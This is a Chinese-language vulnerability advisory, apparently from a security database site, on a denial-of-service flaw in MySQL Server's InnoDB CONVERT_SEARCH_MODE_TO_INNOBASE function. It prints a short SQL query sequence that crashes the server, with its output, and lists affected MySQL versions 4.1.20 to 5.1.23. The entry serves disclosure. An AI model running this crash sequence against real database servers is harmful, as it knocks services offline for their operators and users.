MySQL Server是一款开放源代码的数据库程序。<br />
MySQL Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE函数存在输入验证问题,远程攻击者可以利用漏洞对服务程序进行拒绝服务攻击。<br />
提交如下的查询,可导致MySQL服务器崩溃:<br />
mysql> CREATE TABLE `test` (<br />
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,<br />
`foo` text NOT NULL<br />
) ENGINE=InnoDB DEFAULT CHARSET=latin1;<br />
Query OK, 0 rows affected<br />
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');<br />
Empty set<br />
mysql> ALTER TABLE test ADD INDEX (foo(100));<br />
Query OK, 0 rows affected<br />
Records: 0 Duplicates: 0 Warnings: 0<br />
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');<br />
ERROR 2013 : Lost connection to MySQL server during query<br />
<br />
MySQL AB MySQL 5.1.23
MySQL AB MySQL 5.1.17
MySQL AB MySQL 5.1.16
MySQL AB MySQL 5.0.44
MySQL AB MySQL 4.1.20
目前没有详细漏洞细节提供:
<a href="http://www.mysql.com/" target="_blank">http://www.mysql.com/</a>
京公网安备 11010502034610号
暂无评论